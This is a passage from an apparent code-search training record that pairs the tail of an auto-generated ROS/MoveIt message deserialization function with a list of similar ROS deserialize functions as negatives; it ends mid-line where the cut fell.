struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v279 = val3.time_from_start _x = _v279 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v276.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.planning_options.planning_scene_diff.robot_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.is_diff = bool(self.goal.planning_options.planning_scene_diff.robot_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.TransformStamped() _v280 = val1.header start = end end += 4 (_v280.seq,) = _get_struct_I().unpack(str[start:end]) _v281 = _v280.stamp _x = _v281 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v280.frame_id = str[start:end].decode('utf-8') else: _v280.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.child_frame_id = str[start:end].decode('utf-8') else: val1.child_frame_id = str[start:end] _v282 = val1.transform _v283 = _v282.translation _x = _v283 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v284 = _v282.rotation _x = _v284 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values = [] for i in range(0, length): val1 = moveit_msgs.msg.AllowedCollisionEntry() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) val1.enabled = struct.unpack(pattern, str[start:end]) val1.enabled = map(bool, val1.enabled) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = struct.unpack(pattern, str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = map(bool, self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkPadding() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.padding,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkScale() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.scale,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors = [] for i in range(0, length): val1 = moveit_msgs.msg.ObjectColor() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v285 = val1.color _x = _v285 start = end end += 16 (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.CollisionObject() _v286 = val1.header start = end end += 4 (_v286.seq,) = _get_struct_I().unpack(str[start:end]) _v287 = _v286.stamp _x = _v287 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v286.frame_id = str[start:end].decode('utf-8') else: _v286.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v288 = val1.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v288.key = str[start:end].decode('utf-8') else: _v288.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v288.db = str[start:end].decode('utf-8') else: _v288.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitives = [] for i in range(0, length): val2 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val2.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val2.dimensions = struct.unpack(pattern, str[start:end]) val1.primitives.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitive_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v289 = val2.position _x = _v289 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v290 = val2.orientation _x = _v290 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.primitive_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.meshes = [] for i in range(0, length): val2 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.triangles = [] for i in range(0, length): val3 = shape_msgs.msg.MeshTriangle() start = end end += 12 val3.vertex_indices = _get_struct_3I().unpack(str[start:end]) val2.triangles.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.vertices = [] for i in range(0, length): val3 = geometry_msgs.msg.Point() _x = val3 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val2.vertices.append(val3) val1.meshes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.mesh_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v291 = val2.position _x = _v291 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v292 = val2.orientation _x = _v292 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.mesh_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.planes = [] for i in range(0, length): val2 = shape_msgs.msg.Plane() start = end end += 32 val2.coef = _get_struct_4d().unpack(str[start:end]) val1.planes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.plane_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v293 = val2.position _x = _v293 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v294 = val2.orientation _x = _v294 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.plane_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.subframe_names.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v295 = val2.position _x = _v295 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v296 = val2.orientation _x = _v296 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.subframe_poses.append(val2) start = end end += 1 (val1.operation,) = _get_struct_b().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects.append(val1) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end] _x = self start = end end += 68 (_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end] start = end end += 1 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary = bool(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end] start = end end += 8 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution,) = _get_struct_d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sb'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data = struct.unpack(pattern, str[start:end]) _x = self start = end end += 28 (_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay,) = _get_struct_3BidBid().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.is_diff = bool(self.goal.planning_options.planning_scene_diff.is_diff) self.goal.planning_options.plan_only = bool(self.goal.planning_options.plan_only) self.goal.planning_options.look_around = bool(self.goal.planning_options.look_around) self.goal.planning_options.replan = bool(self.goal.planning_options.replan) return self except struct.error as e: raise genpy.DeserializationError(e) #most likely buffer underfill
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cmd = str[start:end].decode('utf-8')\n else:\n self.cmd = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cat = str[start:end].decode('utf-8')\n else:\n self.cat = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle,) = _get_struct_ihih3i3d2i2d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 3\n (_x.gear, _x.front_diff, _x.rear_diff,) = _struct_3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 8\n (self.i,) = _struct_d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo,) = _get_struct_q6d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 1\n (self.result,) = _struct_B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.Header.frame_id = str[start:end]\n _x = self\n start = end\n end += 11\n (_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num,) = _get_struct_2hHBI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.prefixes is None:\n self.prefixes = None\n if self.address is None:\n self.address = knowrob_semantic_map_msgs.msg.SemMapAddress()\n if self.objects is None:\n self.objects = None\n if self.actions is None:\n self.actions = None\n if self.object_properties is None:\n self.object_properties = None\n if self.data_properties is None:\n self.data_properties = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.prefixes = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapPrefix()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.prefix = str[start:end].decode('utf-8')\n else:\n val1.prefix = str[start:end]\n self.prefixes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.imports = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.imports.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.room_nr = str[start:end].decode('utf-8')\n else:\n self.address.room_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.floor_nr = str[start:end].decode('utf-8')\n else:\n self.address.floor_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_nr = str[start:end].decode('utf-8')\n else:\n self.address.street_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_name = str[start:end].decode('utf-8')\n else:\n self.address.street_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.city_name = str[start:end].decode('utf-8')\n else:\n self.address.city_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObject()\n _v7 = val1.header\n start = end\n end += 4\n (_v7.seq,) = _struct_I.unpack(str[start:end])\n _v8 = _v7.stamp\n _x = _v8\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v7.frame_id = str[start:end].decode('utf-8')\n else:\n _v7.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n _v9 = val1.size\n _x = _v9\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v10 = val1.pose\n _v11 = _v10.position\n _x = _v11\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v12 = _v10.orientation\n _x = _v12\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.part_of = str[start:end].decode('utf-8')\n else:\n val1.part_of = str[start:end]\n self.objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actions = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapAction()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n start = end\n end += 1\n (val1.asserted,) = _struct_B.unpack(str[start:end])\n val1.asserted = bool(val1.asserted)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object_acted_on = str[start:end].decode('utf-8')\n else:\n val1.object_acted_on = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.subactions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.subactions.append(val2)\n _x = val1\n start = end\n end += 2\n (_x.quantification, _x.unordered,) = _struct_bB.unpack(str[start:end])\n val1.unordered = bool(val1.unordered)\n self.actions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.object_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObjectProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object = str[start:end].decode('utf-8')\n else:\n val1.object = str[start:end]\n self.object_properties.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapDataProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 1\n (val1.value_type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.data_properties.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _from_cpp(self, str_msg, cls):\n msg = cls()\n result = msg.deserialize(str_msg)\n return result", "def deserialize(self, str):\n try:\n if self.icon is None:\n self.icon = rocon_std_msgs.msg.Icon()\n if self.remappings is None:\n self.remappings = None\n if self.pairing is None:\n self.pairing = rocon_interaction_msgs.msg.Pairing()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.compatibility = str[start:end].decode('utf-8')\n else:\n self.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.display_name = str[start:end].decode('utf-8')\n else:\n self.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.description = str[start:end].decode('utf-8')\n else:\n self.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.resource_name = str[start:end].decode('utf-8')\n else:\n self.icon.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.format = str[start:end].decode('utf-8')\n else:\n self.icon.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.icon.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parameters = str[start:end].decode('utf-8')\n else:\n self.parameters = str[start:end]\n start = end\n end += 4\n (self.max,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pairing.rapp = str[start:end].decode('utf-8')\n else:\n self.pairing.rapp = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = str[start:end].decode('utf-8')\n else:\n val1.remap_from = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_to = str[start:end].decode('utf-8')\n else:\n val1.remap_to = str[start:end]\n self.pairing.remappings.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pairing.parameters = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.key = str[start:end].decode('utf-8')\n else:\n val1.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.pairing.parameters.append(val1)\n start = end\n end += 4\n (self.hash,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.role = str[start:end].decode('utf-8')\n else:\n self.role = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.battery_voltage,) = _struct_f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if 